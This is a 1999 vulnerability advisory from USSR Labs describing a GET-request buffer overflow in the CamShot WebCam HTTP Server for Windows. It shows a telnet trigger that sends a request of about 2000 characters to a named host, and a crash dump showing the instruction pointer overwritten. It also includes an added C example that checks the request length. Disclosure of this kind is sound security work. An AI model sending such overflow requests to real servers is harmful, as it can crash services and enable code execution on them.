Kitetoa, les pizzaïolos du Ouèb

w00giving 99 -17-


Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
Server v2.5 for Win9x/NT

USSR Advisory Code:   USSR-99028

Release Date:
December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly other versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages containing
time stamped images captured from a video camera. The images can be viewed
from anywhere on the network with a web browser. CamShot works with 'Video
For Windows' compatible video equipment. Finally a cheap and simple way to do
remote surveillance is here!

THE PROBLEM

UssrLabs found a local / remote buffer overflow. The code that handles GET
commands has an unchecked buffer that will allow arbitrary code to be
executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

Where (buffer) is approx. 2000 characters. At this point the server overflows.

On the remote machine, someone will see something like this:

CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8
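
The check that THE PROBLEM says is missing, as an added example (not CamShot's code and not part of the original advisory): a GET request-line parser that checks the target length before copying and answers 414 instead of overflowing. The function name, the status-code mapping and the 255-byte limit are assumptions of this sketch.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 255 /* assumed limit for this sketch, not CamShot's real buffer size */

/* Parse "GET <target> HTTP/x.y" from a request line of known length and copy
 * the target, NUL-terminated, into out (capacity out_cap bytes).
 * Returns an HTTP status: 200 ok, 400 malformed, 414 target too long,
 * 501 method other than GET. The length is checked before any byte is copied. */
int parse_get_line(const char *line, size_t len, char *out, size_t out_cap)
{
    const char *p, *sp, *end = line + len;
    size_t tlen;

    if (out_cap == 0)
        return 400;
    out[0] = '\0';                  /* caller never sees stale data on error */
    if (len < 4)
        return 400;
    if (memcmp(line, "GET ", 4) != 0)
        return 501;
    p = line + 4;
    sp = memchr(p, ' ', (size_t)(end - p)); /* space before the version token */
    if (sp == NULL || sp == p)
        return 400;
    tlen = (size_t)(sp - p);
    if (tlen > MAX_TARGET || tlen >= out_cap)
        return 414; /* URI Too Long: reject instead of truncating or overflowing */
    if ((size_t)(end - sp) < 6 || memcmp(sp + 1, "HTTP/", 5) != 0)
        return 400;
    memcpy(out, p, tlen);
    out[tlen] = '\0';
    return 200;
}

int main(void)
{
    char target[MAX_TARGET + 1];
    char big[4 + 2000 + 9 + 1]; /* constructed input: GET, 2000 filler bytes, version */
    const char *ok = "GET /index.html HTTP/1.1"; /* constructed sample request */
    int s_ok, s_big;

    memcpy(big, "GET ", 4);
    memset(big + 4, 'a', 2000);
    memcpy(big + 2004, " HTTP/1.1", 10);
    s_ok = parse_get_line(ok, strlen(ok), target, sizeof target);
    s_big = parse_get_line(big, strlen(big), target, sizeof target);
    printf("normal request: %d, 2000-byte target: %d\n", s_ok, s_big);
    return 0;
}
```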

Binary or source for this Exploit (when we finish it):

http://www.ussrback.com/

Vendor Status:
Informed.

Vendor Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm

Credit: USSRLABS

SOLUTION
Nothing yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com

 
